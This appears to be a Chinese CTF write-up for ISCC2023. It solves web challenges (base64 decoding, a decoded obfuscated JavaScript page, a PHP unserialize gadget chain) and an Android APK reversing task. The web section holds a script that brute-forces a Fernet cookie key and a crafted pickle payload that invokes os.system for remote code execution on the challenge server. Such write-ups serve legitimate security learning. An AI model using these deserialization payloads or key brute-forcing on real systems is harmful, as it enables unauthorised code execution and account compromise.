ISCC2023
目录
https://kjd3xtsq9r.feishu.cn/docs/doccnyU9DQVNEIhvjc72lMc2yq3#EizBUz
WEB
羊了个羊
U1ZORFEzczJkR3BvZWpsdVlrWk9WMWd5ZGpOa05VTTFORGRwTTIweFRFRktVRWwzVFgwPQ==
两次base64
ISCC{6tjhz9nbFNWX2v3d5C547i3m1LAJPIwM}
Where_is_your_love
vue.js
function decode(str){
var result="";
for(i=1;i<str.length;i+=3){
result+=""+String.fromCharCode(parseInt((str.substr(i,2)).toString(2),14));
}
return result;
}
eval(decode("%72%7d%71%85%7b%73%7c%84%34%87%82%77%84%73%2c%72%73%71%7d%72%73%2c%26%29%3a%3a%29%3d%38%29%3d%3d%29%40%3c%29%38%3a%29%3d%3d%29%3d%38%29%3a%3b%29%38%3c%29%3b%39%29%3b%72%29%3a%70%29%3a%70%29%39%3d%29%38%3c%29%38%3a%29%40%39%29%40%3a%29%40%41%29%3d%6d%29%3d%39%29%3a%3b%29%38%3c%29%40%36%29%3d%72%29%40%39%29%3d%3d%29%40%3a%29%3d%3d%29%3d%72%29%3d%71%29%3a%38%29%3c%72%29%3d%36%29%40%39%29%3d%72%29%3d%6d%29%40%3b%29%40%3a%29%3d%39%29%3a%39%29%3d%6d%29%3d%39%29%3d%3a%29%40%3a%29%3a%38%29%39%40%29%39%3c%29%39%3c%29%38%3c%29%38%3a%29%3d%72%29%3d%71%29%3d%70%29%3d%72%29%40%3b%29%40%39%29%3d%39%29%3d%70%29%3d%72%29%40%3c%29%3d%39%29%3a%3b%29%38%3c%29%3d%39%29%40%39%29%3d%37%29%3d%38%29%40%3c%29%38%71%29%38%72%29%38%3c%29%3a%3c%29%3a%3a%29%3d%3d%29%3d%71%29%40%36%29%40%3b%29%40%3a%29%38%3a%29%3d%3d%29%3d%38%29%3a%3b%29%38%3c%29%3d%36%29%40%3b%29%40%3a%29%38%3c%29%38%3a%29%40%3a%29%40%41%29%40%36%29%3d%39%29%3a%3b%29%38%3c%29%3d%36%29%40%3b%29%40%3a%29%40%3a%29%3d%72%29%3d%71%29%38%3c%29%38%3a%29%40%3c%29%3c%72%29%3d%6d%29%40%3b%29%3d%39%29%3a%3b%29%38%3c%29%3d%37%29%3d%6d%29%3d%3d%29%3d%37%29%3d%41%29%38%3a%29%3d%70%29%3d%39%29%38%3b%29%38%3c%29%38%3a%29%3d%72%29%3d%71%29%3d%3a%29%3d%72%29%3d%37%29%40%3b%29%40%39%29%3a%3b%29%38%3c%29%3d%71%29%3d%72%29%3d%41%29%40%36%29%38%71%29%38%72%29%3a%39%29%38%3c%29%38%3a%29%3d%72%29%3d%71%29%3d%37%29%3d%6d%29%3d%3d%29%3d%37%29%3d%41%29%3a%3b%29%38%3c%29%40%3d%29%3d%3d%29%3d%71%29%3d%38%29%3d%72%29%40%3d%29%39%3a%29%3d%6d%29%3d%72%29%3d%37%29%3c%72%29%40%3a%29%3d%3d%29%3d%72%29%3d%71%29%3a%3b%29%38%70%29%3a%71%29%3d%72%29%40%3d%29%3d%71%29%3d%6d%29%3d%72%29%3c%72%29%3d%38%29%39%3a%29%40%36%29%3d%3c%29%40%36%29%38%70%29%3a%39%29%38%3c%29%3a%3c%29%3a%3a%29%39%3b%29%3d%38%29%3d%3d%29%40%3c%29%3a%3c%26%2d%2d"));
eval(decode("%72%7d%71%85%7b%73%7c%84%34%87%82%77%84%73%2c%72%73%71%7d%72%73%2c%26%29%3a%3a%29%3d%38%29%3d%3d%29%40%3c%29%38%3a%29%3d%3d%29%3d%38%29%3a%3b%29%38%3c%29%3b%39%29%3b%72%29%3a%70%29%3a%70%29%39%40%29%38%3c%29%38%3a%29%40%39%29%40%3a%29%40%41%29%3d%6d%29%3d%39%29%3a%3b%29%38%3c%29%40%36%29%3d%72%29%40%39%29%3d%3d%29%40%3a%29%3d%3d%29%3d%72%29%3d%71%29%3a%38%29%3c%72%29%3d%36%29%40%39%29%3d%72%29%3d%6d%29%40%3b%29%40%3a%29%3d%39%29%3a%39%29%3d%6d%29%3d%39%29%3d%3a%29%40%3a%29%3a%38%29%39%71%29%39%3c%29%39%3c%29%38%3c%29%38%3a%29%3d%72%29%3d%71%29%3d%70%29%3d%72%29%40%3b%29%40%39%29%3d%39%29%3d%70%29%3d%72%29%40%3c%29%3d%39%29%3a%3b%29%38%3c%29%3d%39%29%40%39%29%3d%37%29%3d%70%29%40%3c%29%38%71%29%38%72%29%38%3c%29%3a%3c%29%3a%3a%29%3d%3d%29%3d%71%29%40%36%29%40%3b%29%40%3a%29%38%3a%29%3d%3d%29%3d%38%29%3a%3b%29%38%3c%29%3d%36%29%40%3b%29%40%3a%29%39%3d%29%38%3c%29%38%3a%29%40%3a%29%40%41%29%40%36%29%3d%39%29%3a%3b%29%38%3c%29%3d%36%29%40%3b%29%40%3a%29%40%3a%29%3d%72%29%3d%71%29%38%3c%29%38%3a%29%40%3c%29%3c%72%29%3d%6d%29%40%3b%29%3d%39%29%3a%3b%29%38%3c%29%3d%3a%29%3d%72%29%3d%6d%29%3d%6d%29%3d%72%29%40%3d%29%38%3a%29%3d%70%29%3d%39%29%38%3b%29%38%3c%29%38%3a%29%3d%72%29%3d%71%29%3d%3a%29%3d%72%29%3d%37%29%40%3b%29%40%39%29%3a%3b%29%38%3c%29%3d%71%29%3d%72%29%3d%41%29%40%36%29%38%71%29%38%72%29%3a%39%29%38%3c%29%38%3a%29%3d%72%29%3d%71%29%3d%37%29%3d%6d%29%3d%3d%29%3d%37%29%3d%41%29%3a%3b%29%38%3c%29%40%3d%29%3d%3d%29%3d%71%29%3d%38%29%3d%72%29%40%3d%29%39%3a%29%3d%6d%29%3d%72%29%3d%37%29%3c%72%29%40%3a%29%3d%3d%29%3d%72%29%3d%71%29%3a%3b%29%38%70%29%3a%72%29%3d%71%29%3d%37%29%39%3a%29%40%36%29%3d%3c%29%40%36%29%38%70%29%3a%39%29%38%3c%29%39%3b%29%3a%3c%29%3a%3a%29%39%3b%29%3d%38%29%3d%3d%29%40%3c%29%3a%3c%26%2d%2d"));
eval(decode("%72%7d%71%85%7b%73%7c%84%34%87%82%77%84%73%2c%72%73%71%7d%72%73%2c%26%29%3a%3a%29%3d%38%29%3d%3d%29%40%3c%29%38%3a%29%3d%3d%29%3d%38%29%3a%3b%29%38%3c%29%3b%39%29%3b%72%29%3a%70%29%3a%70%29%39%41%29%38%3c%29%38%3a%29%40%39%29%40%3a%29%40%41%29%3d%6d%29%3d%39%29%3a%3b%29%38%3c%29%40%36%29%3d%72%29%40%39%29%3d%3d%29%40%3a%29%3d%3d%29%3d%72%29%3d%71%29%3a%38%29%3c%72%29%3d%36%29%40%39%29%3d%72%29%3d%6d%29%40%3b%29%40%3a%29%3d%39%29%3a%39%29%3d%6d%29%3d%39%29%3d%3a%29%40%3a%29%3a%38%29%3a%36%29%39%3c%29%39%3c%29%38%3c%29%38%3a%29%3d%72%29%3d%71%29%3d%70%29%3d%72%29%40%3b%29%40%39%29%3d%39%29%3d%70%29%3d%72%29%40%3c%29%3d%39%29%3a%3b%29%38%3c%29%3d%39%29%40%39%29%3d%37%29%40%39%29%40%3d%29%38%71%29%38%72%29%38%3c%29%3a%3c%29%3a%3a%29%3d%3d%29%3d%71%29%40%36%29%40%3b%29%40%3a%29%38%3a%29%3d%3d%29%3d%38%29%3a%3b%29%38%3c%29%3d%36%29%40%3b%29%40%3a%29%39%40%29%38%3c%29%38%3a%29%40%3a%29%40%41%29%40%36%29%3d%39%29%3a%3b%29%38%3c%29%3d%36%29%40%3b%29%40%3a%29%40%3a%29%3d%72%29%3d%71%29%38%3c%29%38%3a%29%38%3a%29%40%3c%29%3c%72%29%3d%6d%29%40%3b%29%3d%39%29%3a%3b%29%38%3c%29%3d%6d%29%3d%72%29%3d%72%29%3d%41%29%38%3a%29%3d%70%29%3d%39%29%38%3b%29%38%3c%29%38%3a%29%3d%72%29%3d%71%29%3d%3a%29%3d%72%29%3d%37%29%40%3b%29%40%39%29%3a%3b%29%38%3c%29%3d%71%29%3d%72%29%3d%41%29%40%36%29%38%71%29%38%72%29%3a%39%29%38%3c%29%38%3a%29%3d%72%29%3d%71%29%3d%37%29%3d%6d%29%3d%3d%29%3d%37%29%3d%41%29%3a%3b%29%38%3c%29%40%3d%29%3d%3d%29%3d%71%29%3d%38%29%3d%72%29%40%3d%29%39%3a%29%3d%6d%29%3d%72%29%3d%37%29%3c%72%29%40%3a%29%3d%3d%29%3d%72%29%3d%71%29%3a%3b%29%38%70%29%3b%3c%29%3d%72%29%40%3c%29%3d%39%29%3b%72%29%40%3a%29%3d%72%29%40%38%29%40%41%29%39%3a%29%40%36%29%3d%3c%29%40%36%29%38%70%29%3a%39%29%38%3c%29%39%3b%29%3a%3c%29%3a%3a%29%39%3b%29%3d%38%29%3d%3d%29%40%3c%29%3a%3c%26%2d%2d"));
eval(decode("%7d%70%78%45%72%7d%71%85%7b%73%7c%84%34%75%73%84%4d%7a%73%7b%73%7c%84%4a%89%53%72%2c%26%53%5d%4b%4b%37%26%2d%43%72%7d%71%85%7b%73%7c%84%34%7d%7c%7b%7d%85%83%73%7b%7d%86%73%45%73%83%71%72%86%43%72%7d%71%85%7b%73%7c%84%34%7d%7c%79%73%89%80%82%73%83%83%45%7c%7d%79%80%43%7d%70%78%34%83%84%89%7a%73%34%7a%73%74%84%45%33%38%36%36%43%7d%70%78%34%83%84%89%7a%73%34%84%7d%80%45%33%38%36%36%43%86%6d%82%24%77%45%36%32%6d%88%45%36%32%6d%89%45%38%36%36%32%83%87%45%37%32%82%45%39%36%36%43%72%7d%71%85%7b%73%7c%84%34%75%73%84%4d%7a%73%7b%73%7c%84%4a%89%53%72%2c%2b%53%5d%4b%4b%37%2b%2d%34%83%84%89%7a%73%34%84%7d%80%45%33%3b%3b%36%43%72%7d%71%85%7b%73%7c%84%34%7d%7c%71%7d%7c%84%73%88%84%7b%73%7c%85%45%7c%7d%79%80%43%72%7d%71%85%7b%73%7c%84%34%7d%7c%83%73%7a%73%71%84%83%84%6d%82%84%45%7c%7d%79%80%43%72%7d%71%85%7b%73%7c%84%34%7d%7c%72%82%6d%75%83%84%6d%82%84%45%7c%7d%79%80%43"));
eval(decode("%87%77%7c%45%72%7d%71%85%7b%73%7c%84%34%75%73%84%4d%7a%73%7b%73%7c%84%4a%89%53%72%2c%26%53%5d%4b%4b%38%26%2d%43"));
eval(decode("%83%7d%82%45%72%7d%71%85%7b%73%7c%84%34%75%73%84%4d%7a%73%7b%73%7c%84%4a%89%53%72%2c%26%53%5d%4b%4b%39%26%2d"));
得到
> "<div id="ISCC1" style="position:absolute;left:200" onmousemove="escdv()"><input id="but" type="button" value="click me!" onfocus="nokp();" onclick="window.location='Download.php';"></div>"
> "<div id="ISCC2" style="position:absolute;left:600" onmousemove="escmv()"><input id="but1" type="button" value="follow me!" onfocus="nokp();" onclick="window.location='Enc.php';"/></div>"
> "<div id="ISCC3" style="position:absolute;left:800" onmousemove="escsw()"><input id="but2" type="button" value="look me!" onfocus="nokp();" onclick="window.location='LoveStory.php';"/></div>"
Download.php ==> keyiscc.pem
Enc.php ==> letter.php
LoveStory.php
?> <?php
include("./xxxiscc.php");
class boy {
public $like;
public function __destruct() {
echo "能请你喝杯奶茶吗?<br>";
@$this->like->make_friends();
}
public function __toString() {
echo "拱火大法好<br>";
return $this->like->string;
}
}
class girl {
private $boyname;
public function __call($func, $args) {
echo "我害羞羞<br>";
isset($this->boyname->name);
}
}
class helper {
private $name;
private $string;
public function __construct($string) {
$this->string = $string;
}
public function __isset($val) {
echo "僚机上线<br>";
echo $this->name;
}
public function __get($name) {
echo "僚机不懈努力<br>";
$var = $this->$name;
$var[$name]();
}
}
class love_story {
public function love() {
echo "爱情萌芽<br>";
array_walk($this, function($make, $colo){
echo "坠入爱河,给你爱的密码<br>";
if ($make[0] === "girl_and_boy" && $colo === "fall_in_love") {
global $flag;
echo $flag;
}
});
}
}
if (isset($_GET["iscc"])) {
$a=unserialize($_GET['iscc']);
} else {
highlight_file(__FILE__);
}
上大号说话
输入 马保国,提示有东西在.git下
app.py.bak
class ED:
def __init__(self):
self.file_key = ... # 1Aa
self.cipher_suite = Fernet(self.generate_key(self.file_key))
def crypto(self, base_str):
return self.cipher_suite.encrypt(base_str)
@staticmethod
def generate_key(key: str):
key_byte = key.encode()
return base64.urlsafe_b64encode(key_byte + b'0' * 28)
def check_cookies(cookie):
ed = ED()
f, result = ed.decrypto(cookie)
black_list = ...
if not result[0:2] == b'\x80\x03':
return False
...
try:
result = pickle.loads(result)
if result.name == 'mabaoguo' and result.random == mabaoguo.random and result.gongfu == mabaoguo.gongfu:
return flag
else:
return result.name
except:
return False
@app.route('/', methods=['GET', 'POST'])
def index():
if request.method == 'POST':
name = request.form['input_field']
name = Member(name)
name_pick = pickle.dumps(name, protocol=3)
name_pick = pickletools.optimize(name_pick)
ed = ED()
response = make_response(redirect('/'))
response.set_cookie('name', ed.crypto(name_pick).decode())
return response
temp_cookies = request.cookies.get('name')
if not temp_cookies:
...
else:
f = check_cookies(temp_cookies)
...
if __name__ == '__main__':
app.run()
通过cookie爆破得到file_key
import string
import base64
from cryptography.fernet import Fernet
dic = [str(i) for i in range(1, 10)]
le = string.ascii_uppercase + string.ascii_lowercase
for i in le:
dic.append(i)
cookie = 'gAAAAABkYiDhLxAZVVyExYlvynjNlizOuHxA3piriLZIQ-gomirHUqdO0ILiMAnI1rmV-k_A8AIue9-2rBh8k9oDLOSsHDFi8vAcHDIrygVheRny82F_jGGjRjlAnptQd0TFFNJI-pn-9-Pyzn3gUXoPxCSxeST0iVJ9MXQgb5WpMb5KsglbmPY='
for i1 in dic:
for i2 in dic:
for i3 in dic:
for i4 in dic:
file_key = i1 + i2 + i3 + i4
cipher_suite = Fernet(base64.urlsafe_b64encode(file_key.encode() + b'0' * 28))
try:
name_pick = cipher_suite.decrypt(cookie)
print(name_pick) # b'\x80\x03c__main__\nMember\n)\x81}(X\x04\x00\x00\x00nameX\x08\x00\x00\x00mabaoguoX\x06\x00\x00\x00randomX\x0f\x00\x00\x00orfszdjckabphxlub.'
print(file_key) # 5MbG
input()
except:
continue
pickle反序列化外带结果
奇安信攻防社区-pickle反序列化深入python源码分析 (butian.net)
class ED:
def __init__(self):
self.file_key="5MbG" # 1Aa
self.cipher_suite = Fernet(self.generate_key(self.file_key))
def crypto(self, base_str):
return self.cipher_suite.encrypt(base_str)
def decrypto(self, base_str):
return self.cipher_suite.decrypt(base_str)
@staticmethod
def generate_key(key: str):
key_byte = key.encode()
return base64.urlsafe_b64encode(key_byte + b'0' * 28)
result = b'\x80\x03cbuiltins\nmap\n(cos\nsystem\n(V{命令}\ntt\x81p0\n0cbuiltins\nbytes\n(g0\nt\x81.'
ed=ED()
base=ed.crypto(result).decode()
print(base)
MOBILE
NOJAVA
apk反编译
apk 反编译(使用apktool、dex2jar、jd-gui,进行反编译apk,查看apk源码)_villen_t的博客-CSDN博客
获取资源
apktool
java -jar .\apktool_2.7.0.jar d -f attachment-21.apk -o MMTS
获取代码
dex2jar-2.0 + jd-gui
.\d2j-dex2jar.bat .\classes.dex
得到.\classes-dex2jar.jar
jd-gui打开
com/example.nojava/MainActivity.class
private final boolean B(String paramString) {
if (paramString.length() <= 6)
return false;
String str = paramString.substring(0, 5);
Intrinsics.checkNotNullExpressionValue(str, "this as java.lang.StringendIndex)");
if (Intrinsics.areEqual(str, "ISCC{") && paramString.charAt(paramString.length() - 1) == '}') {
E e = new E();
e.h();
if (Intrinsics.areEqual(e.j(paramString), "efZYiiYejYefjjejjZfYjije"))
return true;
}
return false;
}
或者jadx gui直接apk反编译
exp.py
import libnum #
s = 'efZYiiYejYefjjejjZfYjije' # 字符串
s = libnum.s2n(s)
a = bin(s)[2:]
a = (4-(len(a)%4))*'0'+a
a = [a[i*4:(i+1)*4] for i in range(len(a)//4)]
payload=""
for i in a:
if i=="1001":
payload+="10"
elif i=="0110":
payload+="01"
elif i=="1010":
payload+="11"
elif i=="0101":
payload+="00"
else:
print("waaa")
print(payload)
print('ISCC{' + libnum.n2s(int(payload, 2)).decode() + '}')
